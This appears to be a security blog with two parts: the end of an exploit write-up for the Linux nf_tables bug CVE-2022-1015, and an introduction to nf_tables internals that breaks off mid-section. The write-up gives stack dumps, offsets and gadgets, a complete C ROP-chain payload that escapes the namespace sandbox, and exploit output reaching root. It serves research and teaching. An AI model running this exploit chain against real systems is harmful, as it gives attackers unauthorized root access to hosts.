0xffffc90000227d78:     0x0000000000000008      0xffff8880052d0480
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e233c00
0xffffc90000227da8:     0x3175125abbd91100      0xffff88800e233c00
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e233c00
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7


Looking at the stack right after the address we leaked we see that at location 0xffffc90000227da8 there is an obvious stack canary.

We have .text addresses at 0xffffc90000227de8 and 0xffffc90000227df0. Let’s look at what offsets they are. The first one is 0x438 bytes away from the start of nft_regs and the other one is 0x440. That makes them outside of our OOB write range.

So obviously the output hook is not an option in our case.

Trying the other hooks 
After it became obvious that the output hook cannot be used on this kernel built I started looking into other hooks. I tried the input hook, prerouting hook, postrouting hook - all without the ingress and forward hooks. After reviewing the stack on all of them I realised none of them have a favourable stack layout (using UDP packets). This was quite disappointing as I had invested a lot of time attempting to do it using UDP packets on the different hooks.

On the prerouting hook I even attempted to split the ROP chain around the stack canary and jump between the two ROP chains - but that also did not work as I could not pass the validation while keeping the length low enough as to not overwrite the stack canary.

After having spent a lot more time than I should have trying to make it work on one of the hooks I decided to look into the stack layout when TCP packets go through the rules.

Exploitation vector through TCP 
One of the reasons I worked so hard to make it work with UDP rather than attempting TCP earlier was because TCP requires a connection to be initiated and that is an extra burden we have to deal with.

Another reason I had to avoid TCP is the fact that the stack might differ between different TCP packets due to different flags being set in their headers. And indeed I observed this behaviour. It could also be viewed as a positive rather than a negative - the more different stack layouts we can get the better the chance that one might be exploitable.

First I attempted of course the output hook. I used a normal SOCK_STREAM socket. Debugging I realised that the stack layout when sending a data packet is not favourable. However, I saw something very interesting… The stack layout looked favourable when the ACKnowledgement packet of the connection initialization was being handled.

Now the obvious next step is to include the payload in the ACK packet that is sent during initialization. To do that I had to use raw sockets and build manually the headers for the SYN and ACK packet. That allowed me to include a payload to the ACK packet where I wouldn’t be able to do that via a SOCK_STREAM socket.

Weirdly the stack layout changed when using a raw socket - it did not look as it did when I was using a normal SOCK_STREAM socket. That was weird… however it wasn’t an obstacle as the new stack layout was also vulnerable. Let’s take a look at it.

gdb-peda$ x/42gx ($rsp+0x50+0x308)
0xffffc90000237d78:     0x0000000000000001      0xffffea0000086d40
0xffffc90000237d88:     0x0000000000000000      0x0000000000000000
0xffffc90000237d98:     0x0000000000000000      0x0000000000000000
0xffffc90000237da8:     0x885b22be57fdfb00      0xffff88800e266e00
0xffffc90000237db8:     0xffffc90000237df8      0xffff88800e266e00
0xffffc90000237dc8:     0x0000000000000010      0x0000000000000006
0xffffc90000237dd8:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237de8:     0xffffffff819b7ab7      0xffffffff819b7ab7
0xffffc90000237df8:     0x0000000000000000      0x00007f1e7f701df0
0xffffc90000237e08:     0xffffffff819b99c8      0x0000000100000000
0xffffc90000237e18:     0x00007f1e78002bc0      0x00000000000000f4
0xffffc90000237e28:     0xffffc90000237e88      0xffff888000000010
0xffffc90000237e38:     0x0000000000000005      0x0000000000000000
0xffffc90000237e48:     0x0000000000000000      0xffffc90000237e28
0xffffc90000237e58:     0x0000000000000000      0x0000000000000000
0xffffc90000237e68:     0x0000000000000255      0x0000000000000000
0xffffc90000237e78:     0x0000000000000000      0x00007f1e78003bc8
0xffffc90000237e88:     0x0100007f56c30002      0x0000000000403f1c
0xffffc90000237e98:     0xffffffff812b14d5      0x0000000000000255
0xffffc90000237ea8:     0x0000000000000006      0xffffc90000237f58
0xffffc90000237eb8:     0x00007f1e78003bc8      0xffff888003e33300


As you can see there are two .text addresses at the addresses 0xffffc90000237de8 and 0xffffc90000237df0. After debugging a little it became clear that the second one is a saved return address. There is also no stack cookie after it in near view.

That address is at offset 0x390 from the beginning of nft_regs. That is in-bounds of our nft_payload_set OOB write.

Our upper bound for the OOB write is 0x450. That leaves us with the ability to write 0xc0 = 192 bytes on the stack. That is 28 words. Should be more than enough for a full ROP chain.

Building an ROP chain 
Now that we have the payload injection sorted it is time we start building an ROP chain.
Our ROP chain could be split into three stages - preparing credentials, leaving the namespace sandbox and returning to userland.

First, we need to setup up our kernel credentials.

prepare_kernel_cred 
We need to call prepare_kernel_cred passing NULL as the argument. If NULL is supplied then the credentials will be set to 0 with no groups, full capabilities and no keys.

In order to do that it would require we know the address of prepare_kernel_cred. On my kernel build it is located at offset 0x108aa0 from the kernel base address. According to the x86_64 convention to set the first argument we need to set the rdi register.



So we need just a single gadget here - to pop rdi. The return value of the prepare_kernel_cred function would of course be saved in the rax register as per the convention.

In total for the prepare_kernel_cred part we would need to pass 3 words.

I found a suitable gadget to pop the rdi register - 0xffffffff81004616 : pop rdi ; ret.
So the offset from the kernel base would be 0x004616.

commit_creds 
After we have prepared the credentials we need to actually install them upon the current task. To do that we need to call commit_creds.

We have the credentials in the rax register. However, we need to pass them to the commit_creds function. To do that we need to move the rax register to the rdi register. The function is located at offset 0x108870 from the kernel base. To move rax to rdi need a mov rdi, rax gadget. That means that it would take only 2 words to call commit_creds.

There is one small problem though. There is no mov rdi, rax ; ret gadget. The best I could find was the following
0xffffffff81020b1d : mov rdi, rax ; mov eax, ebx ; pop rbx ; or rax, rdi ; ret

It is at offset 0x020b1d from the kernel base.
The gadget requires us to pass one dummy value for the rbx register.
That would bring the total size of this stage of the ROP chain to 3 words.

switch_task_namespaces 
To exploit this vulnerability we needed the capability CAP_NET_ADMIN. We gained it by putting our process in a sandbox - with a user+network namespace. Now it is time to escape our sandbox and leave the namespace.

To do this we are going to use switch_task_namespaces. On my build, the entry of that function is at offset 0x107030 from the kernel base.

We have to pass two things to the function - the task whose namespaces we want to switch and the struct nsproxy that holds the namespaces that we are switching to.

We are going to find the task of our process by passing its pid to find_task_by_vpid. That would return a pointer to a task_struct. This pointer is our first argument to switch_task_namespaces.

The structure nsproxy contains pointers to all (net, mnt, pid, cgroup, etc) per-process namespaces. It esentially defines what namespaces a process uses. Every time a namespace of a process is changed it copies the existing nsproxy and modifies it. So all nsproxy instances can be thought of as modifications of an initial one - that of the init process. The initial nsproxy can be accessed with init_nsproxy. It is the second argument we pass to switch_task_namespaces.

Let’s actually see gadgets will be needed to do all of this and how many words we are going to need for this part.

We need 3 words to get the pointer to the task_struct. One gadget to pop rdi, a word to actually pass the pid of our process and one word to call find_task_by_vpid.

To call switch_task_namespaces we would need 5 words. We use a gadget that performs mov rdi, rax - because rax holds the pointer to the task_struct and we want to pass it as a first argument. However, the gadget that I am using has an unnecessary pop in it therefore I need to pass one dummy register. That brings it to two words so far. I need two more words to pass init_nsproxy as a second argument - one for the pop rsi gadget and one for the address of init_nsproxy. And finally, I need a 5th word to call switch_task_namespaces.

In total this stage would require 8 words.

swapgs_restore_regs_and_return_to_usermode 
Now that we have set up our credentials it is time to return execution to usermode. To do that we are going to use a this function as a KPTI trampoline. But why do we need to use a trampoline?

Well we need to swap our GS register. The GS register in the Linux Kernel is used for per-CPU data structures. We need to swap it as we are moving from kernel-space to user-space.

We also need to swap the page tables to the userland ones. That is due to the Kernel Page Table Isolation feature. It separates user-space and kernel-space page tables - from user-space you can see only user-space pages and minimal kernel-space mappings. From kernel-space however you can see both user-space and kernel-space pages but the user-space pages are not executable. That means that if we don’t swap the page tables we cannot return execution to a function from user-space.

The function swapgs_restore_regs_and_return_to_usermode is called a KPTI trampoline because it swaps the GS register for us, changes the page tables and allows us to pass an IRET frame (Interrupt Return frame). Using the IRET frame we can set the Stack Segment (SS) register, the Stack Pointer (RSP), the RFLAGS register, the Code Segment (CS) register and most importantly - the instruction pointer (RIP).

As the RIP we pass a pointer to a function that will spawn a shell. The rest of the registers we can can save before we send the payload and just return the registers to the same values they had before we entered kernel-space.

Let’s take a look at the generated assembly of the swapgs_restore_regs_and_return_to_usermode
0xffffffff81e00ff0 <+0>:     pop    r15
0xffffffff81e00ff2 <+2>:     pop    r14
0xffffffff81e00ff4 <+4>:     pop    r13
0xffffffff81e00ff6 <+6>:     pop    r12
0xffffffff81e00ff8 <+8>:     pop    rbp
0xffffffff81e00ff9 <+9>:     pop    rbx
0xffffffff81e00ffa <+10>:    pop    r11
0xffffffff81e00ffc <+12>:    pop    r10
0xffffffff81e00ffe <+14>:    pop    r9
0xffffffff81e01000 <+16>:    pop    r8
0xffffffff81e01002 <+18>:    pop    rax
0xffffffff81e01003 <+19>:    pop    rcx
0xffffffff81e01004 <+20>:    pop    rdx
0xffffffff81e01005 <+21>:    pop    rsi
0xffffffff81e01006 <+22>:    mov    rdi,rsp
0xffffffff81e01009 <+25>:    mov    rsp,QWORD PTR gs:0x6004
0xffffffff81e01012 <+34>:    push   QWORD PTR [rdi+0x30]
0xffffffff81e01015 <+37>:    push   QWORD PTR [rdi+0x28]
0xffffffff81e01018 <+40>:    push   QWORD PTR [rdi+0x20]
0xffffffff81e0101b <+43>:    push   QWORD PTR [rdi+0x18]
0xffffffff81e0101e <+46>:    push   QWORD PTR [rdi+0x10]
0xffffffff81e01021 <+49>:    push   QWORD PTR [rdi]
...
0xffffffff81e01069 <+121>:   pop    rax
0xffffffff81e0106a <+122>:   pop    rdi
0xffffffff81e0106b <+123>:   swapgs
...

Looking at the generated assembly we see that we pop a lot of register at the start. We wouldn’t want to pass that many dummy values in the ROP chain so we are going to actually call the function at offset <+22> where the first move function starts. However, we will still have to pass two dummy values for the pop instructions at <+122> and <+123>.

The order of the registers that we pass to the IRET frame should be RIP CS RFLAGS SP SS

So in total, this part of the ROP chain would take us:

  1 word to pass the address of swapgs_restore_regs_and_return_to_usermode+22
  2 dummy words for rax and rdi
  5 words for the IRET frame.


In total 8 words.

Summarizing the ROP chain 
The total size of the ROP chain in my case is 23 words. The size will differ between builds due to gadget differences, etc.

int offset = 0;
// clearing interrupts
payload[offset++] = kbase + cli_ret;

// preparing credentials
payload[offset++] = kbase + pop_rdi_ret; 
payload[offset++] = 0x0; // first argument of prepare_kernel_cred
payload[offset++] = kbase + prepare_kernel_cred;

// commiting credentials
payload[offset++] = kbase + mov_rdi_rax_pop_rbx_ret;
payload[offset++] = 0x0; // dummy rbx
payload[offset++] = kbase + commit_creds;

// switching namespaces
payload[offset++] = kbase + pop_rdi_ret;
payload[offset++] = process_id;
payload[offset++] = kbase + find_task_by_vpid;
payload[offset++] = kbase + mov_rdi_rax_pop_rbx_ret;
payload[offset++] = 0x0; // dummy rbx
payload[offset++]	= kbase + pop_rsi_ret;
payload[offset++] = kbase + init_nsproxy;
payload[offset++] = kbase + switch_task_namespaces;

// returning to userland
payload[offset++] = kbase + swapgs_restore_regs_and_return_to_usermode;
payload[offset++] = 0x0; // dummy rax
payload[offset++] = 0x0; // dummy rdi
payload[offset++] = (unsigned long)spawnShell;
payload[offset++] = user_cs;
payload[offset++] = user_rflags;
payload[offset++] = user_sp;
payload[offset++] = user_ss;


This is the complete ROP chain.

Proof-of-Concept 
The PoC is available at https://github.com/ysanatomic/CVE-2022-1015.

# ./exploit
[*] CVE-2022-1015 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

[+] STAGE 1: KASLR bypass 
[*] Socket is opened.
[*] Table leak_table created.
[*] Chain output_chain created.
[*] Bitwise expression is setup!
[*] Payload expression is setup!
[*] Verdict is setup!
[*] Address leak rule created!
[*] Packet sent... if no output in a second - it has failed
[*] Listening on port 50005
[&] Leaked Address: 0xffffffff819bfc63
[&] Kernel base address: 0xffffffff81000000

[+] STAGE 2: Escalation
[*] Socket is opened.
[*] Table rop_table created.
[*] Chain output_chain created.
[*] Copy ROP-to-Stack rules created.
[*] Saved userland registers
[#] cs: 0x33
[#] ss: 0x2b
[#] rsp: 0x7ffd969d1da0
[#] rflags: 0x246

[*] TCP Listener and client threads created!
[+] TCP server socket created.
[+] Bind to the port number: 50006
[*] Listening...
[*] Successfully sent 60 bytes SYN!
[*] Successfully received 48 bytes SYN-ACK!
[*] Sending an ACK packet with the payload...
[***] Exploit ran successfully
uid=0(root) gid=0(root)
#


Closing Remarks 
This vulnerability was extremely interesting to re-discover. The nf_tables codebase seems complicated at first but remarkably simple when you know your way around.

The exploitation stage can be described as a big dose of educational fun even if frustrating at times - especially while hunting for a good hook where the stack is favourable to exploitation.

Massive thanks to David Bouman. His write-up was very educational - especially the overview of nf_tables that kick-started my research.

I hope this write-up was as much fun to read as it was for me to write it.

Feel free to contact me on Twitter or via email if you have any questions.


Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables
2022-11-01T12:00:00+00:00
Introduction
Hello there!

This is an introduction to Netfilter’s nf_tables. While it isn’t a complete study of the internals it can give you a solid base before you start your own research into the module. Or maybe you have experience using tools like iptables and nft and want to see what happens behind the curtain - this article is for you as well.

While I have tried to make it as accessible as possible the article assumes basic knowledge of C and the Linux Kernel.

Table of Contents

  What is Netfilter and nf_tables?
  Building Blocks of the Firewall
    
      Rules
      Chains
      Tables
      Expressions
    
  
  Registers
    
      Data registers
      Verdict register and codes
    
  
  Taking a quick look at nft_do_chain
  Expressions
    
      nft_immediate_expr
      nft_payload
      nft_payload_set
      nft_cmp_expr
      nft_bitwise
      nft_meta
      nft_byteorder
      nft_range_expr
      An example
    
  
  Netfilter Hooks
  The Libraries - libnftnl and libmnl
    
      libmnl
      libnftnl
    
  
  Closing remarks and acknowledgements


What is Netfilter and nf_tables? 
Netfilter is a framework in the Linux Kernel. It allows various network operations to be implemented in the form of handlers via hooks. It could be used for filtering, Network Address Translation or port translation. 
In general it could be summarized as a framework allowing you to direct, modify and control the network flow in a network.

Many userspace programs use netfilter. The most common perhaps is iptables.

The subsystem we will be reviewing is nf_tables. It is responsible for filtering and rerouting packets. It is commonly used for building firewalls as you can create complex rules through which to decide what happens with traffic - if it has to be refused, redirected, modified or accepted.

You can also write your own userspace programs that use the nf_tables subsystem. For that use a library has been developed that significantly simplifies the process - libnftnl (that requires the library libmnl). More on that later.

  Note: libmnl and libnftnl also simplify the development of exploits targeting nf_tables :D


Build a table, assemble a chain, form rules and decide on expressions 
When we talk about netfilter internals we will constantly mention expressions used in rules which form chains that are part of tables. 
That might sound a little bit intimidating but don’t worry we will go over everything.

Rules  
Rules are essentially defined perfectly by their name. They are rules by which packets are filtered. Rules like checking the protocol, the source, the destination, the port, etc. Rules have a verdict - you can decide if you want to drop the packet, reject it or just accept it and go down the chain of rules.


  Example: “udp dport 50001 drop” If the protocol is UDP and the destination port is 50001 it will drop the packet.


In the future when we talk about a rule being “executed” we essentially mean that the packet going through is being evaluated against the rule to determine if the packet fits the rule or not.

Chains  
Chains are essentially linear structures of rules. After one rule is checked it goes to the next one. Sometimes the verdict might make the execution jump to another chain. However we always have a base chain. 
A base chain is where the execution begins from. If there is a rule that checks if the protocol is UDP you can make it so that the execution jumps to another chain that has just rules for UDP packets.

Execution always begins from a base chain because they are the chains attached to a netfilter hook. We will talk extensively about hooks later but they essentially show when a chain should be executed. If an input hook is being used then the chain will be executed against incoming packets - if an output hook - against outgoing packets.

Tables  
Tables are the top-level structures. They contain the chains. Chains can only jump to another chain on the same table.

Tables belong to a particular family. The family defines what type of packets will be handled by the chains in the table.
The families are - ip, ip6, inet, arp, bridge, netdev.

Tables belonging to the families ip and ip6 see only IPv4 and IPv6 packets respectively. The inet family allows a table to see both IPv4 and IPv6 packets.

The arp family allows tables to see ARP-level traffic while tables belonging to the bridge family only see packets traversing bridges.

The netdev family allows base chains to be attached to a particular network interface. Such base chains will then see all network traffic on that interface. That means that ARP traffic can be handled from here as well. The netdev family is only used when the base chains of the table will use the ingress hook but more on that later.

Expressions  
Expressions are like little operations where you can pass the arguments. They perform actions on packets. Expressions, executed (or rather evaluated) one after another form a rule.
An example for an expression is the payload expression nft_payload_expr. It copies data from the packet’s headers and saves it into the registers. 
The registers are like a local data storage that you can write to and read from with expressions. They can be used to pass data between expressions.

So in conclusion: Expressions are operators we can use by providing them with arguments. Multiple expressions that will be evaluated one after the other form a rule. Multiple rules chained together form a chain.

  Ex: If we have the rule udp dport 50001 drop
We first compare the protocol if it is udp with an expression
Then we check if the destination port is 50001 with another expression
and then if both are true we use another expression to drop the package - by setting a verdict


Registers 
We will now take a look at a very essential part - The Registers.
Registers store data in them. That data can be accessed or modified by expressions by targetting a specific register.
Although registers can be viewed as separate it is most of the time useful to see them as one continuous buffer of data where the register index is just an offset of the buffer.

But how much data can we store in the registers? That part might be a little bit confusing

Originally there were five 16 byte registers. One verdict register and four data registers - each is 16 bytes. In total 80 bytes.

  Verdict (16) + 4 * data (16) = 80


But now stuff is a little different - there is still one 16 byte register - the verdict register but now the data registers can be addressed as sixteen each 4 bytes.

  Verdict(16) + 16 * data (4) = 80


Data registers 
So the data registers used to be four - each 16 bytes. Now they are sixteen - each 4 bytes.

We can view the registers as one continuous buffer of data where the registers are just offsets in that buffer.
Well that would mean we just have two types of offsets. The first type is every 16 bytes. The second type is every 4 bytes.

Lets take a look at the register’s enum type - it defines the offsets.
enum nft_registers {
	NFT_REG_VERDICT,
	NFT_REG_1,
	NFT_REG_2,
	NFT_REG_3,
	NFT_REG_4,
	__NFT_REG_MAX,

	NFT_REG32_00	= 8,
	NFT_REG32_01,
	NFT_REG32_02,
	...
	NFT_REG32_13,
	NFT_REG32_14,
	NFT_REG32_15,
};

NFT_REG_1 to NFT_REG_4 are the 16 byte offsets while NFT_REG32_00 to NFT_REG32_15 are the 4 byte ones.



We mentioned multiple times the verdict register. So lets talk about it.

Verdict register 
The verdict register sits at offset zero in the registers. The size of the verdict register is 16 bytes. During each rule a verdict can be set for the packet. The verdict can be set to the following values:

  NFT_CONTINUE - reached after the chain is executed fully. Allows the packet through the firewall. The default verdict. If the verdict is set to anything but this -> no more expressions will be executed in the rule. Depending on the verdict that might mean that we just continue down the other rules, go to another chain or completely drop the packet.
  NFT_BREAK - the rest of the expressions in the rules are skipped but then it goes down the rules in the chain normally.
  NF_DROP - drop the packet - no more expressions will be performed.
  NF_ACCEPT - accepts the packet preemptively.
  NFT_GOTO - go to another chain and go through the rules there. It does not return to the current chain.
  NFT_JUMP - jump to another chain and after going through the rules there if the verdict there is NF_CONTINUE it allows the packet to return to the original chain and continue with the rules in it.
    
      Verdicts like NF_DROP and NF_ACCEPT (and the unmentioned NF_STOLEN and NF_QUEUE) just return that code to the caller for them to decide to do with the packet.
    
  


Or the verdict can be set to jump which means that now the execution will jump to another chain in the table and the rules in that chain will be checked against our packet going through the firewall.
So the verdict register controls the fate of our packet - where it goes through and finally if it is allowed or not. Or we can say that the verdict controls the execution flow.

However, the internal structure of the verdict register is I fear a little bit more confusing.
As we said it is 16 bytes. The first 4 bytes are the actual verdict. Those 4 bytes take the codes we just talked about.
The other 12 bytes are used if the verdict is NF_JUMP or NF_GOTO and they point to the other chain.

Taking a quick look at nft_do_chain 
Now that we established what the main building blocks are - expressions, rules, chains and tables and we talked a bit about how the execution flow is controlled - through verdicts. Lets now actually take a look at nft_do_chain - the function that actually goes through the rules in a chain and executes their expressions. We will be taking a look at the snippet containing the code of the function with some added comments to explain its behavior…
unsigned int
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
	const struct nft_chain *chain = priv, *basechain = chain;
	const struct nft_rule_dp *rule, *last_rule;
	const struct net *net = nft_net(pkt);
	const struct nft_expr *expr, *last;
	struct nft_regs regs = {};
	unsigned int stackptr = 0;
	struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
	bool genbit = READ_ONCE(net->nft.gencursor);
	struct nft_rule_blob *blob;
	struct nft_traceinfo info;

	info.trace = false;
	if (static_branch_unlikely(&nft_trace_enabled))
		nft_trace_init(&info, pkt, &regs.verdict, basechain);
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;
	/* we get the last rule so we know when to stop the processing */
	last_rule = (void *)blob->data + blob->size;
next_rule: // this section is executed every time there is a rule
	regs.verdict.code = NFT_CONTINUE; // the default verdict code = NFT_CONTINUE
	for (; rule < last_rule; rule = nft_rule_next(rule)) { // iterate through the rules
		/* iterate through the expressions */
		nft_rule_dp_for_each_expr(expr, last, rule) {
			// execute the expression
			if (expr->ops == &nft_cmp_fast_ops)
				nft_cmp_fast_eval(expr, &regs);
			else if (expr->ops == &nft_cmp16_fast_ops)
				nft_cmp16_fast_eval(expr, &regs);
			else if (expr->ops == &nft_bitwise_fast_ops)
				nft_bitwise_fast_eval(expr, &regs);
			else if (expr->ops != &nft_payload_fast_ops ||
				 !nft_payload_fast_eval(expr, &regs, pkt))
				expr_call_ops_eval(expr, &regs, pkt);
			/* if the code is anything but continue stop going through the expresions in that rule */
			if (regs.verdict.code != NFT_CONTINUE) 
				break;
		}

		/* section where it makes decisions what to do based on verdict */
		switch (regs.verdict.code) { 
		case NFT_BREAK: 
			// if NFT_BREAK -> set verdict back to continue and continue
			// with the next rule on the chain
			// NFT_BREAK just stops execution of the expressions in one rule
			// and skips the rest of the expressions in the rule
			// after that it continues down the rules normally as if NFT_CONTINUE
			regs.verdict.code = NFT_CONTINUE;
			nft_trace_copy_nftrace(pkt, &info);
			continue;
		case NFT_CONTINUE:
			// if we hit this that means we went through all the expressions
			// if NFT_CONTINUE -> we successfully went through the expressions 
			// in the rule and we can continue to the next rule
			nft_trace_packet(pkt, &info, chain, rule,
					 NFT_TRACETYPE_RULE);
			continue;
		}
		/* If not NFT_BREAK and not NFT_CONTINUE we know we will be exiting the chain */
		/* no more rules will be checked in that chain */
		break;
	}

	nft_trace_verdict(&info, chain, rule, &regs);

	/* We hit the switches below after we finish with a chain */
	/* could be through a graceful exit or through a verdict prematurely set */
	switch (regs.verdict.code & NF_VERDICT_MASK) {
	case NF_ACCEPT:
	case NF_DROP:
	case NF_QUEUE:
	case NF_STOLEN:
		// if NF_ACCEPT, NF_DROP, NF_QUEUE or NF_STOLEN we just exit the function
		// returning the verdict to the caller 
		return regs.verdict.code;
	}

	/* This switch is a responsible for the -control flow- */
	/* It determines through the verdict what to do with the execution */
	/* Here JUMPs and GOTOs are performed */
	switch (regs.verdict.code) {
	case NFT_JUMP: 
		/* If NFT_JUMP we just set up stuff for a jump - expecting to return */
		if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE))
			return NF_DROP;
		jumpstack[stackptr].chain = chain;
		jumpstack[stackptr].rule = nft_rule_next(rule);
		jumpstack[stackptr].last_rule = last_rule;
		stackptr++;
		fallthrough;
	case NFT_GOTO:
		/* If NFT_GOTO we just goto the other chain - not expecting to return */
		// the previous case fallsthrough to this one to perform the jump to another chain
		// while NFT_GOTO skips the preparation because it won't be returning to this chain
		chain = regs.verdict.chain;
		goto do_chain;
	case NFT_CONTINUE: // if gone through the rules with no other verdict
	case NFT_RETURN: // if returned from a chain early
		/* If the case is NFT_CONTINUE or NFT_RETURN */
		/* work with that chain is finished */
		break;
	default:
		WARN_ON_ONCE(1);
	return nft_base_chain(basechain)->policy;
}


The Expressions 
As we said expressions perform some action on packets or registers.

An important thing to talk about is the operations and structure of expressions.
static const struct nft_expr_ops nft_imm_ops = {
	.type		= &nft_imm_type, // the expression type
	.size		= NFT_EXPR_SIZE(sizeof(struct nft_immediate_expr)),
	.eval		= nft_immediate_eval, // called when the expression is 'ran'
	.init		= nft_immediate_init, // called when added with a rule
	.activate	= nft_immediate_activate,
	.deactivate	= nft_immediate_deactivate,
	.destroy	= nft_immediate_destroy,
	.dump		= nft_immediate_dump,
	.validate	= nft_immediate_validate,
	.reduce		= nft_immediate_reduce,
	.offload	= nft_immediate_offload,
	.offload_action	= nft_immediate_offload_action,
};

Every time a rule is added - the init function of all of its expressions is called to make sure the data passed to the expressions is valid. Whenever an expression is ran its eval function is called - the function actually performing the expression. And so on and so forth.

This is how each expression is defined in the codebase.
Let’s actually take a look at the most commonly used expressions and expain how they can be used.

nft_immediate_expr 
This expression is probably the most simple one. It gets constant data and puts it into the registers. That’s all it does. 
It is most often used to set the verdict register.
struct nft_immediate_expr {
	struct nft_data		data;
	u8			dreg;
	u8			dlen;
};

It needs a dreg - a destination register and a dlen - the destination length. The first parameter dreg is the offset at which the data is going to be written. The second parameter dlen just shows the length of the data being written.

The constant data is also passed with the paremeter data of type struct nft_data.
/* include/net/netfilter/nf_tables.h */
struct nft_data {
	union {
		u32			data[4];
		struct nft_verdict	verdict;
	};
} __attribute__((aligned(__alignof__(u64))));

We can see that nft_data can hold either a verdict or 16 bytes of data.
So with nft_immediate_expr we can set a verdict or write up to 16 bytes of arbitary data to the registers.

nft_payload 
This expression is another essential one. It is used to copy from the packets to the registers.
struct nft_payload {
	enum nft_payload_bases	base:8;
	u8			offset;
	u8			len;
	u8			dreg;
};

The first parameter here is a base. The type is enum nft_payload_bases so let us take take a look at it.
/* include/uapi/linux/netfilter/nf_tables.h */
/**
 * enum nft_payload_bases - nf_tables payload expression offset bases
 *
 * @NFT_PAYLOAD_LL_HEADER: link layer header
 * @NFT_PAYLOAD_NETWORK_HEADER: network header
 * @NFT_PAYLOAD_TRANSPORT_HEADER: transport header
 * @NFT_PAYLOAD_INNER_HEADER: inner header / payload
 */
enum nft_payload_bases {
	NFT_PAYLOAD_LL_HEADER,
	NFT_PAYLOAD_NETWORK_HEADER,
	NFT_PAYLOAD_TRANSPORT_HEADER,
	NFT_PAYLOAD_INNER_HEADER,
};

So the bases we could use target headers at the different OSI levels. 
The second parameter we have in the nft_payload is offset - it defines the offset at which we start copying from, relative to the base provided. For example, in the UDP header the destination port is at offset 2 bytes from the start of the UDP header. So to copy the destination port we would use the NFT_PAYLOAD_TRANSPORT_HEADER base and offset = 2.
The third parameter we have is the len parameter. It just specifies the amount of bytes we are going to be copying.
The fourth parameter is dreg which specifies to which register we are going to be copying.
So lets have an example - If we want to copy the TCP checksum to the third small register (small = 4-byte one) we are going to set the values of the expression to:
base = NFT_PAYLOAD_TRANSPORT_HEADER
offset = 16 -> the checksum is 16 bytes away from the start of the TCP header
len = 2 -> the checksum is 2 bytes
dreg = NFT_REG32_02 (the small registers start frrom NFT_REG32_00)


nft_payload_set 
This expression is the opposite of nft_payload. Instead of copying from the headers to the registers, we can use nft_payload_set to copy from the registers to the headers.
/* include/net/netfilter/nf_tables_core.h */
struct nft_payload_set {
	enum nft_payload_bases	base:8;
	u8			offset;
	u8			len;
	u8			sreg;
	u8			csum_type;
	u8			csum_offset;
	u8			csum_flags;
};

We provide a base which specifies what type of header we target (at what OSI level). The offset parameter specifies at what offset we are going to write relative to the beginning of the header and len shows how many bytes we are going to be copying from the registers to the packet. The last essential argument is sreg which holds the register offset from which we are going to copy len bytes.

We also have some optional checksum parameters.
/* include/uapi/linux/netfilter/nf_tables.h */
/**
 * enum nft_payload_csum_types - nf_tables payload expression checksum types
 *
 * @NFT_PAYLOAD_CSUM_NONE: no checksumming
 * @NFT_PAYLOAD_CSUM_INET: internet checksum (RFC 791)
 * @NFT_PAYLOAD_CSUM_SCTP: CRC-32c, for use in SCTP header (RFC 3309)
 */
enum nft_payload_csum_types {
	NFT_PAYLOAD_CSUM_NONE,
	NFT_PAYLOAD_CSUM_INET,
	NFT_PAYLOAD_CSUM_SCTP,
};


This expression allow us to directly modify the incoming packets before they reach the application layer or the outgoing ones before they leave the network. So for an example it could be used to redirect packets to different addresses or ports.

nft_cmp_expr 
We are going to take a look at the comparison expression. It can be used to control the flow of the execution of expressions depending on if a condition is met.
struct nft_cmp_expr {
	struct nft_data		data;
	u8			sreg;
	u8			len;
	enum nft_cmp_ops	op:8;
};

The first parameter we have here is data. This is the constant data against which we are going to be comparing. So one of our arguments in the comparison is always constant. The other is defined by sreg and len.

Now we have to take a look at the type of relational operators.
/**
 * enum nft_cmp_ops - nf_tables relational operator
 *
 * @NFT_CMP_EQ: equal
 * @NFT_CMP_NEQ: not equal
 * @NFT_CMP_LT: less than
 * @NFT_CMP_LTE: less than or equal to
 * @NFT_CMP_GT: greater than
 * @NFT_CMP_GTE: greater than or equal to
 */
enum nft_cmp_ops {
	NFT_CMP_EQ,
	NFT_CMP_NEQ,
	NFT_CMP_LT,
	NFT_CMP_LTE,
	NFT_CMP_GT,
	NFT_CMP_GTE,
};

For example if we choose NFT_CMP_LT the comparison is going to be register < data where register is the data we get from sreg (with length len) and data is the constant data that we are providing to the expression.

But what happens if the comparison evaluates to true and what happens if it evaluates to false?
If it evalutes to true execution continues normally down the expressions in the current rule.
If it evaluates to false it sets the verdict code to NFT_BREAK which means that no more expressions will be executed in the current rule but then it would continue down normally down the rest of the rules in the chain.

nft_bitwise 
Now we are going to take a look at an expression that performs bitwise operations on the registers.
struct nft_bitwise {
	u8			sreg;
	u8			dreg;
	enum nft_bitwise_ops	op:8;
	u8			len;
	struct nft_data		mask;
	struct nft_data		xor;
	struct nft_data		data;
};

The first obvious parameters are sreg, dreg and len. The parameters sreg and len define on what registers we are going to be performing the operation on and dreg defines where the data is going to be put after the bitwise operation has been performed.

Now it is time to take a look at the different bitwise operations.
/**
 * enum nft_bitwise_ops - nf_tables bitwise operations
 *
 * @NFT_BITWISE_BOOL: mask-and-xor operation used to implement NOT, AND, OR and
 *                    XOR boolean operations
 * @NFT_BITWISE_LSHIFT: left-shift operation
 * @NFT_BITWISE_RSHIFT: right-shift operation
 */
enum nft_bitwise_ops {
	NFT_BITWISE_BOOL,
	NFT_BITWISE_LSHIFT,
	NFT_BITWISE_RSHIFT,
};

The parameters mask and xor can be set if the operation is NFT_BITWISE_BOOL when we want perform a boolean operation. The data parameter has to be set if the operation is NFT_BITWISE_LSHIFT or NFT_BITWISE_RSHIFT. The data parameter is set to the amount we want to shift by.

nft_meta 
